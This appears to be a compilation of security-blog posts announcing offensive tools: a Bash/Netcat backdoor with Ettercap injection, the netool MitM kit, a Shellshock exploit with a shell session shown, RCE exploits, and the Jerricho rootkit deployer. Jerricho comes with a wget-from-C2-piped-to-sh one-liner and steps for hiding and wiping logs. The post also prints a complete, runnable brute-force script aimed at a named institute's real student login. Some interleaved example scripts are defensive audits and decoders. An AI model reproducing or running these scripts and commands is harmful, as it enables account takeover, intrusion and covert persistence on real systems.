--verbose, -v                    Verbose output

Automation :
--bruteonly, -b                  Do not try to enumerate – only bruteforce
--auto, -a                       Non Interactive Mode
--no-colours                     No colour output

Operating Systems :
--windows                        Enumerate Windows OIDs (snmpenum.pl)
--linux                          Enumerate Linux OIDs (snmpenum.pl)
--cisco                          Append extra Cisco OIDs (snmpenum.pl)

Download : Master.zip  | Clone Url 
Source : https://github.com/SECFORCE

Updates Backdoor Bash : Unix remote-shell backdoor develop with Bash, Netcat, OpenSSL.


Changelog:
+ Fix: accept remote connection from netcat
+ Send outputs to the correct logs depending on client or server
+ Fix: accept remote connection from netcat

Unix remote-shell backdoor developed with Bash, Netcat and OpenSSL (data encryption with AES-128)

The main goals of this project are to implement the attack scenario below:
+ Implement a remote-shell-style backdoor with Bash
+ Man-in-the-middle attack with Ettercap (e.g. ARP spoofing)
+ Host a backdoor installer
+ Automate data alteration to inject the backdoor into the target's computer via its browser
If the target (naively) runs the script (i.e. the backdoor installer) without reading the source code, the computer is infected and the attacker obtains remote command access
Detect and prevent this kind of attack with a NIDS tool such as Snort

Notice :
– The programming language was chosen only for a Proof of Concept (POC)
– The socket layer is handled by a portable version of Netcat. I compiled Netcat for the i686 and x86_64 architectures and put the binaries inside this project.
– The transmitted data is encrypted with AES-128 (without using Cryptocat). The data is encrypted on the fly via OpenSSL.

Requirements:
- openssl (tested with v1.0.1j)
- ettercap (>= v0.8.1)
- etterfilter (>= v0.8.1)
- netcat (the bundled build is "The GNU Netcat" v0.7.1)

How does it work?
The backdoor-client connection works locally and remotely (inside the same private network, behind the same access point); see "$HOST" inside "config.sh".

It works only on Unix-like OSes. Currently tested only on:
- Archlinux
- Debian 7
- Ubuntu 14.10

Sample Test : 

git clone git@github.com:pilebones/backdoorBash.git
cd backdoorBash
cp config.sh.sample config.sh 
vim config.sh
./server.sh
./client.sh

Real Conditions:

git clone git@github.com:pilebones/backdoorBash.git
git clone git@github.com:pilebones/etterfilterSamples.git
git clone git@github.com:pilebones/hostingBackdoorInstaller.git
cp backdoorBash/config.sh.sample backdoorBash/config.sh
vim backdoorBash/config.sh
# For export remove client.sh *.log config.sh.sample
tar xvzf hostingBackdoorInstaller/export.tar.gz backdoorBash/
# Configure your vhost to hosting hostingBackdoorInstaller's project
cd etterfilterSamples/inject_backdoor_installer/
# Update Redirect URL from "fake-http-redirect.txt"
vim fake-http-redirect.txt
IFACE=wlanX IP_AP=192.168.0.1 IP_TARGET=192.168.0.x ./run
# From target try to download a shell script like "test.sh" or try with 404 Not Found page (same behavior => inject backdoor installer)
# From target : "chmod +x bd_installer.sh && ./bd_installer.sh"
HOST=192.168.0.x ./client.sh

Download :

etterfilterSamples : Master.zip  | or Clone Url 

Backdoor bash : Master.zip  | or Clone Url
Source : https://github.com/pilebones | our post before

LinEnum v-0.5 Experimental released : Scripted Local Linux Enumeration & Privilege Escalation Checks.


Update 09.02.2015: LinEnum.sh, a script to enumerate local information from a Linux host.

LinEnum automates many of the checks that I've documented in the Local Linux Enumeration & Privilege Escalation Cheatsheet. It is a very basic shell script that performs over 65 checks, getting anything from kernel information to locating possible escalation points such as potentially useful SUID/SGID files and sudo/rhosts misconfigurations, and more.

LinEnum : Scripted Local Linux Enumeration & Privilege Escalation Checks

High-level summary of the checks/tasks performed by LinEnum:
System Information:
+ Kernel and distribution release details
+ Hostname
Networking details:
+ Current IP
+ Default route details
+ DNS server information
User Information:
+ Current user details
+ Last logged on users
+ List all users including uid/gid information
+ List root accounts
+ Extracts password policies and hash storage method information
+ Checks umask value
+ Checks if password hashes are stored in /etc/passwd
+ Extract full details for 'default' uids such as 0, 1000, 1001 etc.
+ Attempt to read restricted files i.e. /etc/shadow
+ List current user's history files (i.e. .bash_history, .nano_history etc.)
+ Basic SSH checks
Privileged access:
+ Determine if /etc/sudoers is accessible
+ Determine if the current user has sudo access without a password
+ Are known 'good' breakout binaries available via sudo (i.e. nmap, vim etc.)
+ Is root's home directory accessible
+ List permissions for /home/
Environmental:
+ Display current $PATH
Jobs/Tasks:
+ List all cron jobs
+ Locate all world-writable cron jobs
+ Locate cron jobs owned by other users of the system
Services:
+ List network connections (TCP & UDP)
+ List running processes
+ Lookup and list process binaries and associated permissions
+ List inetd.conf/xinetd.conf contents and associated binary file permissions
+ List init.d binary permissions
Version Information (of the following):
+ Sudo
+ MySQL
+ Postgres
+ Apache
+ Checks user config
Default/Weak Credentials:
+ Checks for default/weak Postgres accounts
+ Checks for default/weak MySQL accounts
Searches:
+ Locate all SUID/SGID files
+ Locate all world-writable SUID/SGID files
+ Locate all SUID/SGID files owned by root
+ Locate 'interesting' SUID/SGID files (i.e. nmap, vim etc.)
+ List all world-writable files
+ Find/list all accessible *.plan files and display contents
+ Find/list all accessible *.rhosts files and display contents
+ Show NFS server details
+ Locate *.conf and *.log files containing keyword supplied at script runtime
+ List all *.conf files located in /etc
+ Locate mail
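Four of the checks in the list above (uid 0 accounts, hashes kept in /etc/passwd, SUID files, world-writable files), written out as an added example that is not LinEnum's own code. Each function takes a path, so the same checks run against a copied filesystem or a mounted image as well as the live host; the passwd file built by `make_sample_passwd` is constructed for the demonstration and is not from any real system.

```shell
#!/bin/sh
# Added example, not LinEnum's own code: a few of its enumeration checks,
# parameterised on a path so they can run against /etc/passwd and / on a live
# box or against a copied tree.

# Accounts with uid 0. Anything besides root is a second root account.
list_uid0() {                     # $1 = passwd-format file
    awk -F: '$3 == 0 { print $1 }' "$1"
}

# Accounts whose password field holds a hash instead of x/*/!, i.e. the hash
# is world-readable in passwd instead of living in /etc/shadow.
hashes_in_passwd() {              # $1 = passwd-format file
    awk -F: '$2 != "x" && $2 != "*" && $2 != "!" && $2 != "" { print $1 }' "$1"
}

# SUID binaries below a directory. Compare against a known-good baseline and
# look up matches among the "interesting" breakout binaries (nmap, vim, ...).
find_suid() {                     # $1 = directory to search
    find "$1" -type f -perm -4000 2>/dev/null
}

# World-writable files. Any of these on a cron, init or $PATH location is an
# escalation point.
find_world_writable() {           # $1 = directory to search
    find "$1" -type f -perm -0002 2>/dev/null
}

# Constructed sample passwd (not a real system file): "backup" carries a hash
# in the password field and "toor" is a second uid 0 account.
make_sample_passwd() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
backup:$6$abc$hashhashhash:1001:1001::/home/backup:/bin/sh
toor:x:0:0:second root:/root:/bin/sh
EOF
    printf '%s\n' "$f"
}

# Live usage:
#   list_uid0 /etc/passwd; hashes_in_passwd /etc/passwd
#   find_suid /; find_world_writable /
```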

Download : Master.zip  | Clone
Source: http://www.rebootuser.com/

Updates netool.sh V- 4.4 : MitM PENTESTING OPENSOURCE T00LKIT.


Changelog v-4.4:
* netool.sh => "improved" added zenity "Displays"
* netool.sh => "improved" nmap scanner menu "Redesign/Improved"
* netool.sh => "improved" scan WAN for hosts "port nmap.xml to msf db"
* netool.sh => "added" access t00lkit database "store scans or notes"
* netool.sh => "added" CLEAN_LOGS:YES "toolkit_config"
* netool.sh => "added" CLEAN_HANDLERS:NO "toolkit_config"
* netool.sh => "added" CLEAN_DATABASE:NO "toolkit_config"
* priv8.sh => "improved" all listeners "post-exploitation module added"
* priv8.sh => "added" handler.rc "store listener settings"
* priv8.sh => "added" C-Injector "Inject shellcode using C"
* priv8.sh => "added" 3 new multi-handlers "listeners"
  "'Default Listener, Post-auto.rc, AutoRunScript, Resource_files'"
* INSTALL.sh => "improved" netool toolkit "Installer (Ubuntu|Kali)"

"Scanning - Sniffing - Social Engineering"

Netool is a toolkit written in bash, python and ruby that automates frameworks like Nmap, Driftnet, Sslstrip, Metasploit and Ettercap for MitM attacks. It makes tasks such as sniffing TCP/UDP traffic, man-in-the-middle attacks, SSL sniffing, DNS spoofing, DoS attacks in WAN/LAN networks and TCP/UDP packet manipulation using etter-filters easy, lets you capture pictures from the target's web browsing (driftnet), and uses macchanger to change the MAC address as a decoy for scans.

Rootsector: this module automates attacks that combine DNS_SPOOF with MitM (phishing, social engineering) using the metasploit, apache2 and ettercap frameworks, such as generating payloads, shellcode and backdoors that are delivered by redirecting a target to your phishing web page via dns_spoof and MitM.

The "inurlbr" web scanner (by cleiton) was recently added. It searches for SQL-related bugs using several search engines, and can hand every target it finds to other tools such as nmap through the --comand-vul flag (the flag is spelled that way in inurlbr; _TARGET_ is replaced with each hit).
Example:

inurlbr.php -q 1,2,10 --dork 'inurl:index.php?id=' --exploit-get "?´0x27" \
  -s report.log --comand-vul 'nmap -Pn -p 1-8080 --script http-enum --open _TARGET_'

Operating systems supported:
Linux-Ubuntu | Linux-kali | Parrot security OS | blackbox OS | Linux-backtrack (discontinued) | Mac osx (discontinued).

“TOOLKIT DEPENDENCIES”
zenity | Nmap | Ettercap | Macchanger | Metasploit | Driftnet | Apache2 | sslstrip

“SCANNER INURLBR.php”
curl | libcurl3 | libcurl3-dev | php5 | php5-cli | php5-curl

Features (Modules) :

"1-Show Local Connections"
  "2-Nmap Scanner menu"
        ->
        Ping target
        Show my Ip address
        See/change mac address
        change my PC hostname
        Scan Local network 
        Scan external lan for hosts
        Scan a list of targets (list.txt)          
        Scan remote host for vulns          
        Execute Nmap command
        Search for target geolocation
        ping of dead (DoS)
        Norse (cyber attacks map)
        nmap Nse vuln modules
        nmap Nse discovery modules
        <-
  "3-Open router config"       
  "4-Ip tracer whois"
  "5-firefox webcrawler addon"                           
  "6-Retrieve metadata"
        ->
        retrieve metadata from target website
        retrieve using a fake user-agent
        retrieve only certain file types
        <-
  "7-INURLBR.php (webcrawler)"
        -> 
        scanner inurlbr.php -> Advanced search with multiple engines, provided
        analysis enables to exploit GET/POST capturing emails/urls & internal
        custom validation for each target/url found. also the ability to use
        external frameworks in conjuction with the scanner like nmap,sqlmap,etc
        or simple the use of external scripts.
        <-
  "8-r00tsect0r automated exploits (phishing - social engineering)"
        ->
        package.deb backdoor [Binary linux trojan]
        Backdooring EXE Files [Backdooring EXE Files]
        fakeupdate.exe [dns-spoof phishing backdoor]
        meterpreter powershell invocation payload [by ReL1K]
        host a file attack [dns_spoof+mitm-hosted file]
        clone website [dns-spoof phishing keylogger]
        Java.jar phishing [dns-spoof+java.jar+phishing]
        clone website [dns-spoof + java-applet]
        clone website [browser_autopwn phishing Iframe]
        Block network access [dns-spoof]
        Samsung TV DoS [Plasma TV DoS attack]
        RDP DoS attack [DoS attack against target RDP]
        website DoS flood [DoS attack using syn packets]
        firefox_xpi_bootstrapped_addon automated exploit
        PDF backdoor [insert a payload into a PDF file]
        Winrar backdoor (file spoofing)
        VBScript injection [embed a payload into a Word document]
        ".::[ normal payloads ]::."
        windows.exe payload
        mac osx payload
        linux payload
        java signed applet [multi-operative systems]
        android-meterpreter [android smartphone payload]
        webshell.php [webshell.php backdoor]
        generate shellcode [C,Perl,Ruby,Python,exe,war,vbs,Dll,js]
        Session hijacking [cookie hijacking]
        start a listener [multi-handler]
        <-
  "9-Config ettercap"         
  "10-Launch MitM"            
  "11-Show URLs visited"       
  "12-Sniff remote pics"
  "13-Sniff SSL passwords"      
  "14-Dns-Spoofing"
  "15-Share files on lan"   
  "16-DoS attack {local}"      
  "17-Compile etter.filters"    
  "18-execute ettercap filter"
  "19-Common user password profiler [cupp.py]"

  d. delete lock folders
  a. about netool
  u. check for updates
  c. config toolkit
 db. access database
  q. quit

Download :
opensource.tar.gz (20.1 MB)
opensource[kali].tar.gz (20.1 MB)
Our Post Before  | Source : http://sourceforge.net/projects/netoolsh/

ISILNet Password Cracker Tool v1.0 released.


What's the script's purpose?
To take advantage of security weaknesses in order to brute force any user's password. This is possible because the system uses weak passwords (6-digit numeric), there is no limit on login attempts, and server-side security is not the best.

Experimental tool based on shell scripting for obtaining passwords by brute force from ISILNet system users

How does it work?
The script generates passwords and makes login attempts, and won't stop until one succeeds. Server responses are evaluated to tell whether the login succeeded, failed, or the remote website is under maintenance. In the last case the process waits until the site is available again before retrying, so you just need to run the script and leave it doing its job. Breaking a password can take time: there are 1000000 (one million) combinations to test (which is not much, really), so running the script over a whole weekend is suggested. Your internet connection speed also matters, so please be patient.

What do I need to make it work?
- Unix terminal or Cygwin with bash and wget installed.
- The file must be in UNIX format (LF line endings) and ANSI encoded.

How to make it work?
In order to start cracking a password:
+ Modify the USER variable in the configuration section with the victim's username.
+ Modify other variables only if you know what you are doing, otherwise leave the defaults.
+ Go to your terminal and run: bash /path/to/isil.sh (bash, not sh: the script uses bash-only features such as [[ ]], shopt and brace expansion)

Notes
Before doing anything, you MUST consider the following:
- The author does not take any responsibility for what you could do with this tool; use it at your own risk.
- The author has nothing against the ISILNet system; this tool was only an experiment.
- Everything works as of 18/02/2015. If the system changes its security measures or a major change happens, the script might stop working and some analysis will be needed to make it work again.

Bash Script :

#!/bin/bash

##
# ISILNet Password Cracker Tool v1.0
#
# Author: Oscar Jara [oscar_e24@hotmail.com]
#
# READ THIS BEFORE DOING ANYTHING
#
# The author does not take any responsibility for what you could do with this tool,
# use it at your own risk.
#
# FAQ
#
# What is ISILNet?
# --
# A private web system from ISIL (Instituto San Ignacio de Loyola), a Peruvian institute,
# which is used by students and professors.
#
# What's the script's purpose?
# --
# To take advantage of security weaknesses in order to brute force any user's password.
# This is possible because the system uses weak (6-digit numeric) passwords, there is no
# limit on login attempts and server-side security is not the best.
#
# How does it work?
# --
# The script generates passwords and makes login attempts, and won't stop until one succeeds.
# Server responses are evaluated to tell whether the login succeeded, failed, or the remote
# website is under maintenance. In the last case the process waits until the site is available
# again before retrying, so you just need to run the script and leave it doing its job.
# Breaking a password can take time: there are 1000000 (one million) combinations to test
# (which is not much, really). Running the script over a whole weekend is suggested; your
# internet connection speed also matters, so please be patient.
#
# What do I need to make it work?
# --
# Unix terminal or Cygwin with bash and wget installed.
# The file must be in UNIX format (LF line endings) and ANSI encoded.
#
# How to make it work?
# --
# Modify the USER variable in the configuration section (see below) with the victim's username.
# Modify other variables only if you know what you are doing, otherwise leave the defaults.
# Run it with bash, not sh (the script uses [[ ]], shopt and brace expansion):
#   bash /path/to/script.sh
#
# Enjoy.
##

##
# Match patterns case-insensitively when looking for the response strings below.
# Available since bash v2.
##
shopt -s nocasematch

##
# Configuration section
##
APP_NAME="ISILNet Password Cracker Tool"
APP_VERSION="1.0"
APP_AUTHOR="Oscar Jara"
APP_AUTHOR_EMAIL="oscar_e24@hotmail.com"

##
# Configuration section
# --
# > URL = Where the login requests are processed on the remote website.
# > USER = Username whose password you wish to obtain (e.g. i012345).
##
URL="https://isilnet.isil.pe/login.asp"
USER="i012345"

##
# Configuration section
# --
# After analysing the remote website's behaviour in each case (success, failure or
# maintenance), these variables hold a string that is always found in the corresponding
# server response. They are matched against the Spanish page text, so leave them as they are.
# > SUCCESS_STR = Determines that a login succeeded.
# > FAILED_STR = Determines that a login failed.
# > MAINTENANCE_STR = Determines that the remote website is under maintenance.
##
SUCCESS_STR="bienvenido a isilnet"
FAILED_STR="olvidaste tu clave"
MAINTENANCE_STR="estamos actualizando"

##
# Seconds to wait between polls while the site is under maintenance, so the
# loop does not hammer the server.
##
MAINTENANCE_POLL=30

##
# Login attempts counter
##
c=0

##
# Perform one login attempt with password $1 and print the server response.
##
login_attempt() {
	wget -qO- "${URL}" --post-data "form_user=${USER}&form_pwd=$1"
}

##
# Decide what the server response ($1, obtained with password $2) means by matching it
# (with wildcards) against SUCCESS_STR, FAILED_STR and MAINTENANCE_STR.
# Returns 0 for a successful login and 1 for a failed one; waits and retries while the
# site reports maintenance; exits the script on any unexpected response.
##
is_logged() {
	local o="$1"
	if [[ "$o" == *${SUCCESS_STR}* ]]; then
		return 0
	elif [[ "$o" == *${FAILED_STR}* ]]; then
		return 1
	elif [[ "$o" == *${MAINTENANCE_STR}* ]]; then
		echo -e "\n#~~~~~~~~~~~~~~#\n\nThe system is under maintenance.\n\n#~~~~~~~~~~~~~~#\n"
		while [[ "$o" == *${MAINTENANCE_STR}* ]]; do
			echo "Waiting for the system to come back before continuing..."
			sleep "${MAINTENANCE_POLL}"
			# Check system status again
			o=$(login_attempt "$2")
		done
		echo -e "\n#~~~~~~~~~~~~~~#\n\nThe system is back, the process will continue.\n\n#~~~~~~~~~~~~~~#\n"
		echo "Retrying password $2 on attempt #$c"
		# Evaluate the fresh response (recursion; its return status is ours)
		is_logged "$o" "$2"
	else
		# Possible reasons for reaching this point:
		# > No string matched (odd behaviour)
		# > Remote site not available (down or moved)
		# > Lost connection with host
		# > Network problem, check your internet connection
		echo -e "\n#~~~~~~~~~~~~~~#\n\nUnexpected response from the system, or a connection problem.\n\n#~~~~~~~~~~~~~~#\n"
		echo "Process terminated due to an error."
		exit 1
	fi
}

##
# Generate the passwords used to brute force the account until a login succeeds.
# > Password pattern: 6-digit numeric [0-9]
# > Possible combinations: 1000000 (one million)
##
echo -e "#~~~~~~~~~~~~~~#\n\n${APP_NAME} v${APP_VERSION}\nBy ${APP_AUTHOR} [${APP_AUTHOR_EMAIL}]\n\n#~~~~~~~~~~~~~~#\n"
echo -e "Target user: ${USER}\nRequests will be sent to: ${URL}\n\n#~~~~~~~~~~~~~~#\n"
echo -e "Generating every possible password combination...\n"
for p in {0..9}{0..9}{0..9}{0..9}{0..9}{0..9}; do
	(( c++ ))
	echo "Trying password $p (attempt #$c)"
	# Perform login attempt
	o=$(login_attempt "$p")
	if is_logged "$o" "$p"; then
		echo -e "Attempt [OK]\n\n#~~~~~~~~~~~~~~#\nHACKED!\n\nUser: ${USER}\nPassword: $p\n\n#~~~~~~~~~~~~~~#\n"
		# Save the result in the home directory of the user running the script;
		# the file is overwritten each time new data is found (be careful)
		f="${HOME}/data.txt"
		echo -e "Saving the data to disk.\nSaving..."
		echo "User: ${USER}, Password: $p" > "$f"
		echo -e "Data saved correctly as '$f'\n"
		break
	else
		echo "Attempt failed."
	fi
done
echo "Process finished."
exit 0

Download : Master.zip  | Clone Url
Source : https://github.com/jaraoscar


Bashslayer : A tool written in Python for exploiting the Shellshock vulnerability in bash.


Bashslayer is a tool written in Python for exploiting the Shellshock vulnerability in bash (CVE-2014-6271).
It sends a POST request whose User-Agent header carries the payload: a CGI handler exports the header as an environment variable, and a vulnerable bash executes the code appended to the function definition when it imports that variable.
The tool then tries to connect to the payload (bind shell) or waits for the payload to connect back, depending on the payload type.

Usage
==========

>>To attempt exploitation of a target-
    ./bslayer.py [target host] [payload]
    E.X ./bslayer.py http://localhost/cgi-bin/vuln nc_bind

>>To view available payloads-
    ./bslayer.py payloads

Example
===========

root@kali:~/bashslayer# ./bslayer.py http://localhost/cgi-bin/vuln nc_bind

_____________________________________________________________
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
      / |
     || |
     || |
     || |  BashSlayer v1.0
     || |  Written by Kory Findley (K0FIN)
     || |
     || |
     || |
     || |
     || |
   <======>
      ||
      ||
      ||  
     {:;}


Available Commands >> 
                      > ./bslayer.py [url] [payload]
                      > ./bslayer payloads

E.X   >> ./bslayer.py http://localhost/cgi-bin/file.sh bind
_____________________________________________________________
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

    
[*]Bind shell payload sent.
[>]Socket Established. Press [ENTER] To Start Command Shell- 
------------------------------------------------------------
ID: uid=33(www-data) gid=33(www-data) groups=33(www-data)
------------------------------------------------------------
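The mechanism Bashslayer relies on, as an added example that is not Bashslayer's own code: the request that carries a Shellshock trigger in the User-Agent, a local check of whether a bash still imports such variables, and the log search a defender would run for the same string. The host, path and access-log lines are constructed for the demonstration.

```shell
#!/bin/sh
# Added example, not Bashslayer's code. Host/path and the log lines are
# assumptions made up for illustration.

# A CGI server exports request headers as environment variables
# (HTTP_USER_AGENT). A vulnerable bash that imports a variable whose value
# starts with "() {" runs whatever follows the function body.
build_request() {                 # $1 = host, $2 = path, $3 = command to run
    printf 'POST %s HTTP/1.1\r\n' "$2"
    printf 'Host: %s\r\n' "$1"
    printf 'User-Agent: () { :; }; /bin/bash -c "%s"\r\n' "$3"
    printf 'Content-Length: 0\r\n\r\n'
}

# The same import trick, locally: prints "yes" if this machine's bash executes
# the trailing command, "no" if it is patched (or bash is absent).
local_bash_vulnerable() {
    out=$(env 'x=() { :; }; echo SHOCKED' bash -c ':' 2>/dev/null)
    case "$out" in *SHOCKED*) echo yes ;; *) echo no ;; esac
}

# Detection side: "() {" has no business in a User-Agent. Constructed
# access-log lines; the first is an attempt, the second normal traffic.
SAMPLE_LOG='10.0.0.5 - - [01/Apr/2015:12:00:00 +0000] "POST /cgi-bin/vuln HTTP/1.1" 200 12 "-" "() { :; }; /bin/bash -c \"id\""
10.0.0.6 - - [01/Apr/2015:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"'

shellshock_hits() {               # reads log lines on stdin, prints suspicious ones
    grep -F '() {'
}

count_sample_hits() {
    printf '%s\n' "$SAMPLE_LOG" | shellshock_hits | wc -l | tr -d ' '
}

# Live usage:  shellshock_hits < /var/log/apache2/access.log
```

The grep is deliberately crude: any header, not only User-Agent, reaches the CGI environment, so the string is worth flagging wherever it appears in a request line.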

Download : Master.zip
Source : https://github.com/K0FIN

Cisco SNMP Script v-1.7 released : Automated Cisco SNMP Enumeration, Brute Force, Configuration Download and Password Cracking.


Cisc0wn (Cisco SNMP Script) is a Cisco SNMP enumeration, brute force, config downloader and password cracking script.
Tested and designed to work against Cisco IOS switches and routers.
Changes in version 1.7: fixed a syntax error that caused a bug when the config file contains no enable secrets.

Cisco SNMP enumeration, brute force, config downloader and password cracking script.

Features:
- Checks that SNMP is enabled on the router
- Brute forces the SNMP read-only and read-write community strings (the wordlist used can be changed in the script header)
- Enumerates information such as IOS version, hostname, ARP table, routing table, interface list and IP addresses using the RO or RW community string.
- If an RW community string was found it downloads the router config automatically.
- It then searches for and displays any enable or telnet passwords stored in clear text.
- If it finds Cisco type 7 encoded enable or telnet passwords it decodes them automatically (type 7 is a reversible fixed-key XOR, not a hash).
- It displays any type 5 enable secret (a salted MD5 hash) and attempts to crack it, using John first with its built-in wordlist for speed; if that fails it attempts a full brute-force crack.
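The type 7 decoding step, written out as an added example (this is not Cisc0wn's own code). Type 7 strings are two decimal digits giving an offset into a fixed key, followed by hex bytes each XORed with the next key character; the function below reverses that and a second function pulls every `password 7` / `secret 7` value out of a saved config. The config excerpt is constructed, and the two encoded values in it decode to "cisco" and "lab".

```shell
#!/bin/sh
# Added example, not Cisc0wn's own code: decode Cisco type 7 passwords found
# in a downloaded configuration.

# The fixed key Cisco IOS uses for type 7 obfuscation.
CISCO7_KEY='dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87'

cisco7_decode() {                 # $1 = type 7 string, e.g. 0822455D0A16
    enc=$1
    seed=$(printf '%s' "$enc" | cut -c1-2)
    seed=${seed#0}                # "08" -> 8, avoid octal interpretation
    i=3
    out=""
    while [ "$i" -lt "${#enc}" ]; do
        pair=$(printf '%s' "$enc" | cut -c"$i"-"$((i + 1))")
        kchar=$(printf '%s' "$CISCO7_KEY" | cut -c"$((seed % 53 + 1))")
        kval=$(printf '%d' "'$kchar")           # ordinal of the key character
        byte=$((0x$pair ^ kval))                # XOR the hex byte with it
        out=$out$(printf "\\$(printf '%03o' "$byte")")
        seed=$((seed + 1))
        i=$((i + 2))
    done
    printf '%s\n' "$out"
}

# Constructed config excerpt (not from a real device).
SAMPLE_CONFIG='hostname edge-rtr
enable password 7 0822455D0A16
line vty 0 4
 password 7 0507070D
 login'

# Reads a config on stdin; prints "encoded -> decoded" for each type 7 value,
# wherever the "password 7"/"secret 7" pair appears on the line.
decode_type7_in_config() {
    awk '{ for (i = 1; i <= NF - 2; i++)
             if (($i == "password" || $i == "secret") && $(i + 1) == "7") print $(i + 2) }' \
    | while read -r enc; do
        printf '%s -> %s\n' "$enc" "$(cisco7_decode "$enc")"
    done
}

decode_sample() {
    printf '%s\n' "$SAMPLE_CONFIG" | decode_type7_in_config
}

# Live usage:  decode_type7_in_config < running-config.txt
```

Type 5 secrets (`enable secret 5 $1$...`) cannot be reversed this way; they go to John as the feature list describes.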

Requirements:
Metasploit http://www.metasploit.com
Tested on Backtrack 5 and Kali.

Download : Master.zip  | Clone Url
Source : https://github.com/nccgroup

Updates Exploits – Miscellaneous proof of concept exploit code.


Changelog 01.04.2015:
+ ElasticSearch Remote Code Execution (CVE-2015-1427)
+ ShellShock (httpd) Remote Code Execution (CVE-2014-6271)

Bash "ShellShock" Remote Code Execution

Miscellaneous proof of concept exploit code written at Xiphos Research for testing purposes.
Updates Exploits 01.04.2015 :
+ phpMoAdmin Remote Code Execution (CVE-2015-2208)
+ LotusCMS Remote Code Execution (OSVDB-75095)
+ ElasticSearch Remote Code Execution (CVE-2015-1427)
+ ShellShock (httpd) Remote Code Execution (CVE-2014-6271)
+ TBA

There are no changelogs here, as that would be too much effort, just git commits. Exploits may be updated regularly for greater stability, reliability or stealthiness, so check them for updates regularly.

Exploit for CVE-2015-2208, phpMoAdmin Unauthenticated Remote Code Execution
This is an exploit for the eval() injection vulnerability recently disclosed in the phpMoAdmin MongoDB frontend. Very quick and dirty exploit, written to test out some new ideas I had for writing more streamlined PHP RCE exploits, in this case, using the cookie to set the connectback host/port at runtime when doing a filedropper type thing. See the code for what I mean…

Usage :
To use, simply select which payload you want to use (currently only back_python.php is available, but I plan on adding back_php.php and back_perl.php at a later date). This is the “payload.php”. You also must specify a callback host and port, along with the URL to the vulnerable phpMoAdmin script.

Exploit for OSVDB-75095, LotusCMS 3.0 Unauthenticated Remote Code Execution
This is an exploit for the eval() injection vulnerability found ages ago in LotusCMS. Very quick and dirty exploit, written to test out some new ideas I had for writing more streamlined PHP RCE exploits, in this case, using the cookie to set the connectback host/port at runtime when doing a filedropper type thing. I ended up storing the payload itself in a POST variable, as storing it in the cookie lead to some strange encoding issues. See the code for what I mean. The reason for writing this was to have a reliable “playground” in which to test ideas, and it is going to probably be an evolving piece of work.

Usage:
To use, simply select which payload you want to use (currently only back_python.php is available, but I plan on adding back_php.php and back_perl.php at a later date). This is the “payload.php”. You also must specify a callback host and port, along with the URL to the vulnerable LotusCMS installation.

Download : Master.zip  | Clone Url | Our Post Before
Source : https://github.com/XiphosResearch | http://www.xiphosresearch.com/

Jerricho – a script for deploying simple Linux rootkit and backdoors.


Jerricho is a simple Bourne shell script that quickly drops several persistence mechanisms on a target Linux host. OS support: Ubuntu, CentOS, Debian, FreeBSD.

TODO:
– Add a web interface for managing the connections and running commands.
– Automatically pull down passwords from the local systems, store, and sort them accordingly.
– Add a function to check to see if the system is still infected / running the rootkit and backdoors and if not re-execute/re-infect the system.
– Aggregate sniffer logs
– Keeping track of hosts which are still accessible via rootkit
– add bin to sudoers
– clear up logs better (Could probably do a date check when we execute on the system and remove all log lines that are 5 seconds before and 15 seconds after)
– spider and revert sshd_config
– rootkit – specify multiple ports on cmdline
– add iptables -F to all init scripts.
– Change the timestamp of modified files

Usage :
+ You run it as root and it drops a bunch of backdoors in multiple places. This enabled us to easily retain access at regionals for almost all systems.

+ It runs things out of "/dev/..." and "/dev/  " (two spaces) because hiding in plain sight is easy.

+ To run it from a Metasploit session: sessions -c 'export HISTFILE=/dev/null; wget -q $C2_URL/scripts/jericho2.1.sh -O /dev/stdout | /bin/sh - && history -c'

You must change the C2 URL and C2 IP address (C2_URL and C2_IP in the script header) before use.

This creates several ways back in:
1) drops our kernel rootkit which hooks accept(): lets us back in via any listening port, hides processes, etc.
2) adds a root ssh key
3) drops our modified trixd00rd (takes params from env vars) as 'rsyslogd'
4) drops the rooty ICMP backdoor as 'udevd'
5) backdoors the 'bin' system account and adds it to sudoers
6) adds a setuid shell in "/dev/  /" for re-elevation from the php/bin account if needed
7) drops a basic PHP shell in a couple of likely web roots (http://url/.src.php?e=uptime)
8) adds all likely webserver users to sudoers (www-data, apache, httpd)

Additional:
- removes all entries from who (removes and re-creates the utmp file; we can be selective later)
- optionally installs a root crontab to clear iptables rules every 5 minutes (uncomment the iptables lines if needed)
- optionally runs a bash script that takes down all services every 10s (teams lose points; also currently disabled)
- adds a secondary pubkey location to sshd_config, sourcing keys from /etc/ssh/authorized_keys as well as the standard %h/.ssh directories.
- We actually had people unknowingly remove the kernel backdoor through various upgrade and reboot activities, init script changes, etc., only for us to retain access using the web shell, re-elevate via the suid binary and reinstall.
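Every item in the two lists above leaves a file-system artefact, which makes a defender-side audit straightforward. The script below is an added example and is not part of Jerricho: it checks for the NOPASSWD sudoers entries for service accounts, the extra AuthorizedKeysFile under /etc/ssh, hidden /dev directories holding a setuid shell, and the .src.php webshell. It takes a root path, so it works over a mounted image or copied tree as well as "/"; the tree built by `make_sample_tree` is constructed for the demonstration.

```shell
#!/bin/sh
# Added example, not part of Jerricho: audit a filesystem tree for the
# persistence the script drops. Usage: audit_persistence /   (or a copied root)

audit_persistence() {             # $1 = root of the tree to inspect
    r=${1%/}
    # 1) NOPASSWD sudo for accounts that should never have it
    [ -f "$r/etc/sudoers" ] && grep -E '^(bin|www-data|apache|httpd)[[:space:]].*NOPASSWD' "$r/etc/sudoers" \
        | sed 's/^/sudoers: /'
    # 2) a second key file outside home directories, as appended to sshd_config
    [ -f "$r/etc/ssh/sshd_config" ] && grep -E '^AuthorizedKeysFile[[:space:]]+/etc/' "$r/etc/ssh/sshd_config" \
        | sed 's/^/sshd_config: /'
    # 3) /dev entries named with dots or spaces, and any setuid file under /dev
    find "$r/dev" -mindepth 1 -maxdepth 1 -type d \( -name '.*' -o -name '* *' \) 2>/dev/null \
        | sed 's/^/hidden dev dir: /'
    find "$r/dev" -type f -perm -4000 2>/dev/null | sed 's/^/setuid under dev: /'
    # 4) the dropped PHP one-liner in the usual web roots
    find "$r/var/www" -name '.src.php' 2>/dev/null | sed 's/^/webshell: /'
    return 0
}

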